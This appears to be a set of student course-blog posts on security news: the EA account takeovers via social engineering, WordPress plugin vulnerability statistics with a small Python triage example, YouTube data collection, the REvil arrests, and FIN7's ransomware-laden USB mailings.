The Attack

Attackers targeted customer service representatives, “utilizing threats and other ‘social engineering’ methods” to bypass 2FA and change the email address associated with an account without the original owner’s immediate knowledge or consent, compromising approximately 50 accounts.[1] The attacks, conducted primarily through the live chat feature, were initially rebuffed by customer support representatives, but some eventually caved to the repeated demands.[2]

The Human Factor

No matter how secure a digital system is on the technical side, if the humans operating it turn out to be the weakest link in the chain, the integrity of the whole system can still be compromised. Social engineering is not a new concept, nor is it limited to digital security: it ranges from attackers walking straight past reception and finding server-room doors open, with systems holding confidential data exposed, to classic scams such as the Nigerian prince or the shady “tech support” company telling you your computer is compromised.

“A bad day phishing is still better than a good day at work”
Credit: MySeasonedPalette on Etsy

Because of the low skill requirement and high potential gain of phishing, it is understandably one of the most common attacks[3]. UCalgary students who check their email regularly may be familiar with messages promising lucrative job opportunities if only you reply with your personal information, a common phishing scam that can be used in various ways to compromise your digital security.

The EA case was unusual in that customer service representatives could bypass 2FA and the other security measures that normally require action by the account owner, without any secondary check by a second party such as a manager, which in a security system looks like a fatal flaw disguised as a feature.

Outcome and moving forward

EA has stated that it will work to restore the compromised Ultimate Team accounts to their pre-attack state after verifying ownership, and will mandate training for anyone responsible for handling user accounts and data to help fight future attacks. EA has also stated that it is adding a second layer of managerial approval for any email change request, along with improvements to its automated customer support systems.

In the context of the wider internet, everyone would do well to stay vigilant against both common and novel phishing attacks as they continue to rise in popularity.[3] Phishing is also rapidly evolving, from spear-phishing and whaling, where the attacker impersonates a trusted source or builds rapport with the target, to pharming, which skips the user entirely and instead tampers with DNS resolution so that a correctly typed address leads to a fake site.[4]

References:

[1]: https://www.ea.com/en-gb/games/fifa/fifa-22/news/pitch-notes-fifa-22-account-takeover-update

[2]: https://threatpost.com/phishers-ea-gamers/177575/

[3]: https://www.cisco.com/c/en_ca/products/security/common-cyberattacks.html#~types-of-cyber-attacks

[4]: https://www.tripwire.com/state-of-security/security-awareness/6-common-phishing-attacks-and-how-to-protect-against-them/

WordPress (Plugin) Vulnerabilities More Than Doubled in 2021 and 77% of Them Are Exploitable

Article: https://www.riskbasedsecurity.com/2022/01/11/wordpress-vulnerabilities-more-than-doubled-in-2021/

Depending on your knowledge regarding information security, your first reaction to the title may have been:
(a) “Oh, that’s good to know”,
(b) “What the heck does that mean?”, or
(c) “Should I be panicking, especially since CPSC 329 uses WordPress?!?”

Allow me to offer you context & a translation of the article!


What are WordPress plugins?

Plugins are software components that add functionality to an existing program, giving WordPress users search engine optimization, website builders, e-commerce functions and more. At the time of this post, there are 59,898 free WordPress plugins available for download.

Image: Condescending Wonka meme from “Willy Wonka & the Chocolate Factory” (1971)

What are plugin vulnerabilities?

WordPress is a free and open-source content management system: anyone can contribute to its core functionality, and anyone can publish a plugin. No single authority controls plugin development or tests every plugin against consistent security standards, and not all plugins are designed with security in mind.

Without thorough vetting, plugins for any software or service represent a real risk to websites and organizations. Vulnerabilities in installed plugins can be exploited by malicious actors to extract user data and/or insert malicious content.

Image: “Running a WordPress plugin? I too like to live dangerously,” Austin Powers meme from Austin Powers: International Man of Mystery (1997)

Now that you possess enough context, here is a summary of the article.

Risk Based Security (RBS) researchers had catalogued 10,359 WordPress plugin vulnerabilities by the end of 2021, a 142% increase over 2020. Most importantly, 77% of them (7,993 vulnerabilities) have known public exploits (Risk Based Security, 2022).

[Translation: RBS’s primary concern is not the alarming “spike” in vulnerabilities, but their potential for exploitation!]

Common Vulnerability Scoring System (CVSS)

Good news: the severity of a vulnerability can be measured. Under the “Common Vulnerability Scoring System” (CVSS v3), the NVD rates base scores as None (0.0), Low (0.1 – 3.9), Medium (4.0 – 6.9), High (7.0 – 8.9) and Critical (9.0 – 10.0) (National Vulnerability Database, n.d.).

Since the average CVSS score across all WordPress plugin vulnerabilities is 5.5 (“Medium”), users and organizations may be tempted to follow the traditional criticality approach: patch the vulnerabilities with “High” or “Critical” CVSS scores first and leave the lower-scored ones for later.

However, RBS recommends a “risk-based” approach instead, because malicious actors favour the vulnerabilities they can exploit most easily, regardless of score. Even for a vulnerability with a “Low” CVSS score, RBS advises prioritizing those that (a) are remotely exploitable, (b) have a public exploit, and (c) have a known fix, since those are the ones an attacker can use today and a defender can actually close.
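To make the difference between the two triage approaches concrete, here is an added example (editor-supplied code, not from the RBS article or from WordPress) that sorts a constructed list of plugin vulnerabilities both ways. The plugin names, scores and flags are hypothetical; the severity buckets follow the NVD ratings for CVSS v3 base scores.

```python
from dataclasses import dataclass


def cvss_severity(score: float) -> str:
    """Map a CVSS v3.x base score to the NVD qualitative rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS base score out of range: {score}")
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"


@dataclass(frozen=True)
class PluginVuln:
    plugin: str            # plugin slug (hypothetical names below)
    cvss: float            # CVSS v3 base score
    remote: bool           # exploitable over the network, no local access needed
    public_exploit: bool   # a working exploit has been published
    fix_available: bool    # a patched plugin version exists


def criticality_order(vulns):
    """Traditional triage: fix the highest CVSS score first."""
    return sorted(vulns, key=lambda v: v.cvss, reverse=True)


def risk_based_order(vulns):
    """RBS-style triage: remotely exploitable, publicly exploited and
    fixable vulnerabilities outrank the raw score; CVSS only breaks ties.
    Python sorts tuples element by element, and True > False."""
    return sorted(
        vulns,
        key=lambda v: (v.remote, v.public_exploit, v.fix_available, v.cvss),
        reverse=True,
    )


def exploitable_share(vulns) -> float:
    """Fraction of the list that has a public exploit (the article's 77% figure)."""
    return sum(v.public_exploit for v in vulns) / len(vulns)


# Constructed sample: not real plugins, not real CVEs.
SAMPLE = [
    PluginVuln("hypothetical-forms",   9.8, remote=True,  public_exploit=False, fix_available=False),
    PluginVuln("hypothetical-gallery", 5.3, remote=True,  public_exploit=True,  fix_available=True),
    PluginVuln("hypothetical-seo",     7.5, remote=False, public_exploit=True,  fix_available=True),
    PluginVuln("hypothetical-cache",   3.7, remote=True,  public_exploit=True,  fix_available=True),
]


def compare(vulns=SAMPLE):
    """Return both orderings as lists of plugin slugs, for side-by-side comparison."""
    return {
        "criticality": [v.plugin for v in criticality_order(vulns)],
        "risk_based": [v.plugin for v in risk_based_order(vulns)],
    }


if __name__ == "__main__":
    for name, order in compare().items():
        print(f"{name:>12}: {order}")
    for v in SAMPLE:
        print(f"{v.plugin:22} {v.cvss:4} {cvss_severity(v.cvss)}")
```

Under the risk-based key the “Low” `hypothetical-cache` entry outranks the “Critical” `hypothetical-forms` one, because the latter has neither a public exploit nor a fix yet. In practice the three flags would come from a vulnerability feed rather than be entered by hand, and a vulnerability with no fix still needs a compensating control (disable the plugin, restrict access) rather than being ignored.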

By bringing these issues to the attention of WordPress users, RBS can offer recommendations on how users, organizations, and security professionals can best protect themselves.


Why should this matter to me?

As students of CPSC 329, we are users of WordPress.

Evil Plotting Raccoon (from Torque, “8 Common WordPress Security Mistakes That Could Cost You Dearly”)

Aside from the obvious tip of downloading themes and plugins only from trusted sources (such as the official WordPress.org directory, and scanning the site with a security plugin such as Wordfence), it is important to adopt a “caveat emptor” mentality: the principle that the buyer alone is responsible for checking the quality of goods before a purchase is made.

It is up to users to research the quality of a plugin before they click the download button: whether it is actively maintained, when it was last updated, and whether it has a history of disclosed vulnerabilities.


References:

Austin Powers Meme Generator. (n.d.). Austin Powers Running a WordPress Plugin I Too Like to Live Dangerously. https://memegenerator.net/instance/80388167/dangerously-austin-powers-running-a-wordpress-plugin-i-too-like-to-live-dangerously

National Vulnerability Database (n.d.). NVD – Vulnerability Metrics. https://nvd.nist.gov/vuln-metrics/cvss

Risk Based Security. (2022, January 11). WordPress vulnerabilities more than doubled in 2021. https://www.riskbasedsecurity.com/2022/01/11/wordpress-vulnerabilities-more-than-doubled-in-2021/

Torque. (March 21, 2017). 8 Common WordPress Security Mistakes That Could Cost You Dearly. https://torquemag.io/2017/03/wordpress-security-mistakes/

Willy Wonka Meme Generator (n.d.). Willy Wonka Oh So You’re a WordPress Developer Tell Me More About the Thirty PlugIns You Use. https://memegenerator.net/instance/54004449/willy-wonka-oh-so-youre-a-wordpress-developer-tell-me-more-about-the-thirty-plugins-you-use

WordPress. (n.d.). WordPress Plugins. https://wpsites.ucalgary.ca/isec-601-f21/wp-admin/post.php?post=568&action=edit

“They” have been “treating” us the way “they” think is correct. What should we do?

“They”, in this blog post, means governments and/or technology companies. While we feel lucky to live in a world full of convenient high-tech products, we often do not realize that “they” are “stealing” our digital traces and deciding how to “treat” us based on those traces.

Like Rainey Reitman said,

“Modern life means leaving digital traces wherever we go. But those digital footprints can translate to real-world harms: the websites you visit can impact the mortgage offers, car loans and job options you see advertised. This surveillance-based, algorithmic decision-making can be difficult to see, much less address.”

The podcast episode “Podcast Episode: Algorithms for a Just Future”, by Rainey Reitman, the link: https://www.eff.org/deeplinks/2022/01/podcast-episode-algorithms-just-future

Sometimes, “they” really “treat” us in a bad way.

Here is an example about how “they” “treat” me based on the digital traces “they” “steal” from me in my daily life:

As a Chinese international student at the U of C, I always set the app’s default language to “Simplified Chinese”. Based on this, YouTube’s algorithms “think” that I must be a person from Mainland China, and YouTube has been showing me this kind of video every day for a very long time:

Reference: A screenshot on the topic of a news video provided by CNN on YouTube, link: https://www.youtube.com/watch?v=idl3ZJG36PY&t=27s

This kind of video really disturbs me, because I never care about politics. By the way, my mother’s great-grandfather was one of the richest capitalists in my home city before the founding of the PRC, and my grandfather (my father’s father) was a county mayor after the founding of the PRC. So, I always stay neutral on politics. However, even though I have e-mailed YouTube many times about this, they still keep “recommending” this kind of video to me. The reason they keep doing this, I think, is that YouTube’s algorithms believe I could become an “anti-CCP” person. Also, I have never allowed them to show me “recommended” videos based on my personal YouTube account settings, because I think my account settings are also part of my privacy that I need to protect. Unfortunately, YouTube has truly “stolen” my privacy.

If you have read the article “These Apps Collect the Most Personal Data” by Jason Cohen (https://www.pcmag.com/news/sick-of-data-collection-try-these-apps-instead), you will find that the example above is quite normal.

The article includes this diagram:

From the diagram above, we can see that YouTube is the “most data-hungry streaming app”. YouTube tracks almost every kind of data segment except “Financial Info”. The worst part is that if we do not agree to YouTube’s Privacy Details, it will not let us use it on our smartphones. As a result, we have to allow YouTube to “steal” our personal information if we want to use it on our smartphones.

However, sometimes, the way “they” “treat” us may truly help us a lot.

The diagram above shows that YouTube can track our browsing history and search history. Why does YouTube do this? Because YouTube’s algorithms decide which videos to show us as “recommended videos” on the main page, or as advertisement videos, by analysing our browsing and search history on the Internet. Why do I say “this may help us a lot”? Here is another example from my own experience:

In September 2021, I found that my laptop was about to break down. As a CPSC student I could not study at home without a laptop, so I started looking on the Internet, as quickly as possible, for a new laptop that would suit me. After about six days, YouTube’s algorithms detected that I was trying to find a laptop to buy. So, while I was watching a video about Haskell programming on YouTube, it suddenly showed me this advertisement:

Reference: A screenshot on the advertisement video for ASUS TUF Dash F15, link: https://www.youtube.com/watch?v=xLAND8p6LkM

After I watched this advertisement, I decided to buy this laptop and got it from Best Buy the same day. I have been using it for almost four months since then, and I have realized that it is truly what I need. This time, I must say YouTube’s algorithms helped me a lot; sometimes it may not be bad to let YouTube “steal” some of my privacy.

Conclusion: What should we do?

Philosophers often say, “Get both sides of a story before making a decision, and find the real truth.” So, if you asked me what we should do in this case, I would say:

  • If you really care about your privacy, then after you choose “Agree” on an app’s “Privacy Details” page (you have to choose “Agree”, otherwise you will not be allowed to use the app), go to your phone’s Settings and manually manage the app’s permissions. In this way, however, you will lose some useful services from the app. Sometimes the app cannot even run normally after it loses some permissions.
  • If you think your privacy is not very important, then you can grant all system permissions to the app. After this, you get the full service from the app and can use all of its functions. However, your privacy will then be “stolen” by this app, and there may be bad consequences if you let the app get your private data so easily. For example, the app owner may learn your home location and your workplace (by tracking your current location), which is not good for your bank account security; the app owner may also obtain your social network (by accessing and analysing the contacts on your smartphone), which is not good for the privacy of the people in your social network.

There are similar things we can do on PCs; you can easily find them on the Internet. In my opinion, compared with smartphones, PCs are much “safer”, because the interface on a PC lets us easily find out which programs in an application are “stealing” our privacy.

Extension: Why do “they” always want to “steal” our privacy?

This is because “they” want to “control” us; “they” even want to “control” everything in society. The first step is to collect (or “steal”) as much information about society as possible. Then “they” use their algorithms to analyse the information “they” have collected and decide which information should be shown to us. In this way, we cannot get the most accurate information; we only get the information “they” want us to know.

This is all about “The Filter Bubble”:

Reference: The TED Talk video “Beware Online “Filter Bubbles””, by Eli Pariser, the link: https://www.ted.com/talks/eli_pariser_beware_online_filter_bubbles

Reference:

  1. The podcast episode “Podcast Episode: Algorithms for a Just Future”, by Rainey Reitman, the link: https://www.eff.org/deeplinks/2022/01/podcast-episode-algorithms-just-future
  2. A screenshot on the topic of a news video provided by CNN on YouTube, link: https://www.youtube.com/watch?v=idl3ZJG36PY&t=27s
  3. The news “These Apps Collect the Most Personal Data”, by Jason Cohen, the link: https://www.pcmag.com/news/sick-of-data-collection-try-these-apps-instead
  4. A screenshot on the advertisement video for ASUS TUF Dash F15, link: https://www.youtube.com/watch?v=xLAND8p6LkM
  5. The TED Talk video “Beware Online “Filter Bubbles””, by Eli Pariser, the link: https://www.ted.com/talks/eli_pariser_beware_online_filter_bubbles

REvil Ransomware Gang Arrested in Russia

Photo showing a wanted poster of hacker Yevgyeniy Igoryevitch Polyanin (photo courtesy of Andrew Harnik/AP)

Last Friday, 14 members of the ransomware group known as REvil were arrested by Russian authorities at the request of the United States[1]. One of those arrested has been described as partially responsible for the Colonial Pipeline attack of May 2021[2]. REvil has carried out numerous cyberattacks since its emergence in 2019[3], among them attacks on the American software company Kaseya[4] and the Brazil-based meat processor JBS[5]. This is the first major case in which Russia has cracked down on a domestic group targeting international organizations.

These arrests are significant both for security and for politics. They likely mean fewer attacks from this group, and those that do occur may be less severe than its past ones. They also set a precedent for cooperation between the United States and Russia against cyber threats. Whether this kind of diplomatic relationship can or will be maintained is something we will have to watch over the coming months and years.

Although the arrests are big news, this is unlikely to be the end of REvil’s attacks. Russian authorities have suggested that all (or at least most) of those arrested are underlings rather than the masterminds behind the attacks[6]. Even if REvil is disbanded, the people primarily behind its operations will likely regroup under a new (or perhaps even the same) name and carry on. We will have to see whether Russian authorities continue to track down and arrest REvil members, or drop the case and consider it settled, at least for now.

This series of arrests comes at a time when political tensions are rising between Russia, Ukraine and the United States, as Russian military forces have massed along the Ukrainian border (possibly in preparation for an invasion). It appears to be the only fruitful agreement between Russia and the U.S., as other talks about peace for Ukraine have failed[7]. The Russian government’s cooperation in this case may well be related to these events.

The Russian government’s action against this domestic hacker group has sparked some interesting discussion and gives us something in the cybersecurity space to watch as time passes. Whether cooperation between the United States and Russia continues, conflicts of interest arise (as they often do), or further events bring more information to light, there is a lot to keep an eye on.

Jan 17 Blog Post – Ransomware infected USBs

Last week, the Federal Bureau of Investigation warned government organizations and private businesses that ransomware-laden USB sticks have been mailed to targets across the United States by a group called FIN7 (Vaas, 2022). Concerningly, FIN7 has disguised its packages to look as though they come from Amazon and/or federal agencies. FIN7’s objective is to compromise the organization’s systems and hold it hostage once an unsuspecting employee connects the infected USB device to a computer, which starts the malware’s installation.

This is disturbing, especially in the present pandemic, when most of the population depends on working software and internet services to stay connected to their day-to-day duties (such as their office). Although Vaas (2022) reports on the United States, the same problem exists in Canada. Malware has become a serious concern since the start of the pandemic, with Canada’s own federal cryptologic agency, the Communications Security Establishment, raising the alarm that ransomware attacks are becoming more aggressive and are specifically targeting critical economic infrastructure and individual Canadians (Reuters, 2021). Since the pandemic began, ransomware has grown in popularity among criminal groups. In 2021, victims of ransomware attacks lost, on average, over two million dollars, double the losses reported in 2020 (Reuters, 2021).

But how can someone be tricked by a random USB stick? Surprisingly, this tactic is very effective. A 2016 study tested it by dropping nearly 300 USB sticks around a university campus. Nearly half of the drives were picked up and plugged into a computer, by students and staff alike (Tischer et al. 2016, p. 1). Most of the people who connected them said they did so out of a sincere intention to find the original owner and return the drive (Tischer et al. 2016).

This tactic remains dangerous for unsuspecting individuals. Groups like FIN7 exploit people who act out of curiosity or a desire to identify the device’s original owner (and return it), and by disguising their devices as government property they make more people willing to believe the device can be trusted. Since USB sticks are cheap and easy to produce, they are ideal for attacking multiple organizations with little effort.

But how can one stay safe? Vaas (2022) offers a few steps to steer clear of an infected USB device:

  1. Do not plug in an unknown USB device, especially if you do not know who the original owner is.
  2. Install endpoint protection software that monitors new devices connecting to your systems.
  3. Follow the “CAP” protocol: cap the number of external entry points, reduce internal access points, and patch unknown entry points.

This is not just about securing the country’s vital economic infrastructure but also about securing your own personal information and devices. The last thing any of us students want is to lose our data and research projects to a USB stick that supposedly holds the final exam’s answers.

References

Reuters. “Ransomware attacks soar, hackers set to become more aggressive – Canada spy agency.” Reuters, December 6, 2021. https://www.reuters.com/technology/ransomware-attacks-soar-hackers-set-become-more-aggressive-canada-spy-agency-2021-12-06/ (Accessed January 16, 2022).

Tischer, Matthew, Zakir Durumeric, Sam Foster, Sunny Duan, Alec Mori, Elie Bursztein, and Michael Bailey. “Users really do plug in USB drives they find.” In 2016 IEEE Symposium on Security and Privacy (SP), pp. 306-319. IEEE, 2016.

Vaas, Lisa. “FIN7 Mails malicious USB sticks to drop ransomware.” Threat Post, January 11, 2022, https://threatpost.com/fin7-mailing-malicious-usb-sticks-ransomware/177541/ (Accessed January 16, 2022).